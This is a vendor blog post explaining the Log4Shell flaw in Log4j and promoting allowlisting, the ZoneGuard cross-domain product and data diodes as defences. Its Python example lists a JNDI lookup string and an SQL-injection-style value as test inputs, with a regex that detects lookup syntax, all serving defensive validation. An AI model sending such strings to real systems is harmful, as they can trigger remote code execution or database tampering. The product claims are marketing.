In December 2021, a vulnerability was found in the Java logging library Log4j. This vulnerability was named Log4Shell. There are ways to protect yourself against this type of vulnerability; in this blog post, we will tell you how.
What is Log4Shell?
The Log4Shell vulnerability found in Log4j is an example of what is called “improper input validation”. A computer program should never trust the input parameters given to the program unless it can be absolutely sure that the parameters come from a reliable source.
Log4j is a Java library that developers use when they want to print or write data from a program. This is common for debugging purposes, but it is also used for generating audit logs or writing various other kinds of information, for example to a file or to the output console. Using what Log4j calls “lookups”, whoever supplied the data can influence how that data is formatted, what it contains and where it is fetched from. The scariest part is that Log4j can also be made to resolve lookups formatted according to JNDI (Java Naming and Directory Interface), which lets it fetch and load code from a remote server.
How can this be exploited practically?
There are many ways in which this vulnerability can be exploited. For example, assume a typical authentication page where you are expected to enter your username and password. For debugging purposes, the programmer who developed the authentication functionality used Log4j to write a log entry containing the username. Instead of a username, the attacker enters a JNDI-formatted string. Because Log4j resolves that lookup, the attacker can affect the vulnerable system, in the worst case executing malicious software on it.
How could this type of attack be prevented?
Allowlisting
There are ways to protect yourself against these kinds of threats. One might think that a firewall could protect your network by only allowing certain traffic to enter it. A firewall monitors and filters which packets enter the network and which are blocked, based on a set of rules. However, if you need to transfer information to or from a security-sensitive network, a firewall should not be the only solution you choose.
If you have security-sensitive or even classified information, you need a viable Cross Domain Solution that offers secure and filtered bidirectional communication. The purpose is to apply strict information-level control during information transfers and mitigate cybersecurity threats such as manipulation, data leakage and intrusion. What should be used is something called allowlisting. The word allowlisting refers to the method of listing what is authorised, instead of blocking the known bad. An allowlist only needs to be updated when you need a new feature in the system. Allowlisting means that you can plan your updates without suddenly facing the need to make an urgent update based on events outside your control.
Advenica products provide strong segmentation and information-aware validation of data flows. Advenica’s Cross Domain Solution, ZoneGuard, only allows data flows and connections that are explicitly configured and allowlisted, and would have blocked the connection to the server with the malicious code. ZoneGuard could also, due to its information awareness property, have blocked the JNDI string entered by the attacker and prevented the attack.
ZoneGuard allows for a strictly controlled two-way filtered information flow supporting third party controls for enforcing a digitally signed information policy. It uses filters in both directions and information is always controlled using full message inspection. The filter can allow information to pass depending on several factors e.g. source/destination addresses, file formats, attributes or the presence of a digital signature.
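As an added illustration (not code from this post or from Advenica’s products), here is what allowlisting looks like at the input-field level for the username scenario described above: the field is validated against the characters the application actually needs, so a lookup-style string is rejected before it ever reaches the logger, without the validator needing to know any particular lookup syntax. The field name, the regular expression and the sample inputs are constructed for the example; a “known bad” scan is included only to contrast the two approaches.

```python
import re

# Allowlist for a username field: only the characters the application
# actually needs (constructed policy for this example). Anything else is
# rejected, regardless of which lookup or JNDI syntax it might contain.
USERNAME_ALLOWED = re.compile(r"[A-Za-z0-9._-]{1,64}")

# "Known bad" pattern: the ${...} lookup syntax Log4j expands. Useful for
# scanning existing log lines, but it must be kept up to date as new bad
# patterns appear, which is exactly the maintenance burden allowlisting avoids.
LOOKUP_SYNTAX = re.compile(r"\$\{[^}]*\}")


def validate_username(value: str) -> bool:
    """Return True only if the whole value matches the allowlist."""
    return USERNAME_ALLOWED.fullmatch(value) is not None


def contains_lookup_syntax(text: str) -> bool:
    """Denylist-style check: does the text contain a ${...} lookup?"""
    return LOOKUP_SYNTAX.search(text) is not None


def log_safe(value: str) -> str:
    """Render an untrusted field for a log line. A value that fails the
    allowlist is replaced by a placeholder with its length, so the raw
    string never reaches the logger and thus never reaches lookup processing."""
    if validate_username(value):
        return value
    return f"<rejected:{len(value)} chars>"


# Constructed sample inputs (not taken from the original post).
# The .invalid top-level domain is reserved and never resolves.
SAMPLES = [
    "alice",
    "bob.smith-01",
    "${jndi:ldap://placeholder.invalid/x}",  # lookup-style string as described in the post
    "carol; DROP TABLE users",
    "",
]


def check_samples() -> dict:
    """Map each sample to (passes allowlist, contains lookup syntax)."""
    return {s: (validate_username(s), contains_lookup_syntax(s)) for s in SAMPLES}


if __name__ == "__main__":
    for sample, (allowed, has_lookup) in check_samples().items():
        print(f"{sample!r:42} allowlist={allowed!s:5} lookup={has_lookup!s:5} log={log_safe(sample)}")
```

Note that the SQL-style sample contains no lookup syntax and would pass the denylist scan, yet the allowlist still rejects it; that is the practical difference between listing the authorised and blocking the known bad.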
Segmentation
Also, strong segmentation and true defence-in-depth should always be applied to protect your critical assets, using e.g. a data diode. Data diodes are the failsafe way to protect sensitive systems and confidential data. They are small hardware devices, also called “unidirectional security gateways”, which sit between two networks. Working like a check valve, the function of a data diode is to allow all data to pass in the forward direction, while blocking all data in the reverse direction.
A data diode can replicate those parts of your application that you need to expose on the internet. A successful attack using Log4Shell, or other vulnerabilities unpublished as of this writing, could have a negative impact on your web application, but the data diode would very efficiently protect your critical information and systems by preventing bidirectional traffic and thus stopping any attempt at communicating with the sensitive system.
This will not be the last time an incident like this occurs. Would you like to make sure that you are ready for future threats? Contact us!